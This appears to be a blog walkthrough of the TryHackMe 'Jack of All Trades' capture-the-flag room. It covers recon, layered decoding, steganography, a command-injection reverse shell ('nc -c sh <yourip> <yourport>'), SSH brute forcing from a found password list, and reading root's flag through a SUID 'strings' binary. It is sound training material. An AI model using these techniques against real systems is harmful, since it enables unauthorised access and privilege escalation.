Jack Of All Trades WalkThrough

Table of contents:

Reconnaissance

Exploitation

Privilege Escalation

Heyyyy guys….

TryHackMe Challenge Link: https://tryhackme.com/room/jackofalltrades

Now we are going to exploit the tryhackme machine, which is jack-of-all-trades.
This is an easy machine that requires a little knowledge on stegnography, cipher encoding & decoding and privilege escalation.

Reconnaissance:

After powering up your machine, perform the port scanning with any tool you are familiar with. Personally, I use Nmap which is a very good tool for finding ports and services.

There are only two ports open.
They are port 22 and 80 which are basically used as 22 for ssh and 80 for http.

But here we can see that both ports are using different services.
It seems like they shuffled the services on purpose.

So we go to our browser and use the IP with the port number to get the page, but there we can see that the port is not allowed in the browser.

So we go to a new tab in Firefox (as we are using the Firefox browser) and type “about:config”

There you can see a search bar. type “network.security.ports.banned.override” , set to string and add the port number 22 to allow the port by the browser.

Now we can see the homepage (jack-of-all-trades)

and the first thing we do is check the source code of the page. This is because we can find the hardcoded credentials as well as some commented text, which helps us as hints in the journey of exploiting the machine.

We can see a note saying

“Note to self — If I ever get locked out I can get back in at /recovery.php!”

and a base64-encoded text underneath it. After decoding the base64 text, we get

“Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: <password>”

We can see there is a “recovery.php” page also, so we browsed the page

and saw the source code and found that there is a base32-encoded text.

After decoding, we found that it was ascii-encoded text, Decoding the ascii-encoded text, we can see that it is encoded with rot13.

This is a 3 layer encoded text. So after decoding the rot13, we got the text saying:

“Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here’s a hint: bit.ly/2TvYQ2S”

Seriously, I didn’t get the hint but the text says recovery login creds are in the homepage.

So I saw the source code of the homepage again and found that there is a steg.jpg image, which made me wonder if there is a stegnography implementation here. So I saved the image and tried
extracting using the Steghide tool and it asked us to enter the passphrase as we had a password before in base64 decoding I used it and done.

The Steghide tool extracted a file called “creds.txt” and there is a text in the file saying
“
Hehe. Gotcha!

You’re on the right path, but wrong image!
“

Then we saved all the images of the home page and used the password against them and got a file extracted from the header.jpg image.

This file contains the username and password for the recovery login,

Exploitation:

so we logged in to the recovery.php page and You will be redirected to “/nnxhweOV/index.php”.

After reading the text I imagined maybe there is a command injection possible, so I used
“?cmd=whoami”

and done. Command injection is possible. So we tried to get a reverse shell using the command injection vulnerability after trying some reverse shells, I found one reverse shell which is working “nc -c sh <yourip> <yourport>”.

Start a listener on your machine and execute the command in the browser.

nc -nvlp 5554

Then we got a shell which is not an interactive shell. We tried getting the interactive shell but it was of no use, so we went to the home folder to see if we could get any hints and we found a file called
“jacks_password_list”. This file contains a list of passwords.

We have an ssh port open so we can brute force the passwords that we used to get into the machine.
and a password from the list gets us into the machine.

We can see there is an image called user.jpg, and we can download the image using the
“scp -P 80 jack@<serverip>:/home/jack/user.jpg <localpath>”
The localpath specifies where you want the image to download.

Opening the image we can find the user’s flag.

Privilege Escalation:

Now time for privilege escalation as we have the password for Jack, we can use sudo -l to see if there is any file that can be run by Jack with root permissions, but sadly we cannot run anything.
So the next step is to find any suid executable files.

Strings shouldn’t have these permissions, so a quick search on gtfobins found that we can read the files which are not accessible by the current privileged user.

so we read the “root/root.txt” file and we got the root flag.

Thanks for the community.

If you like the blog post give us a clap.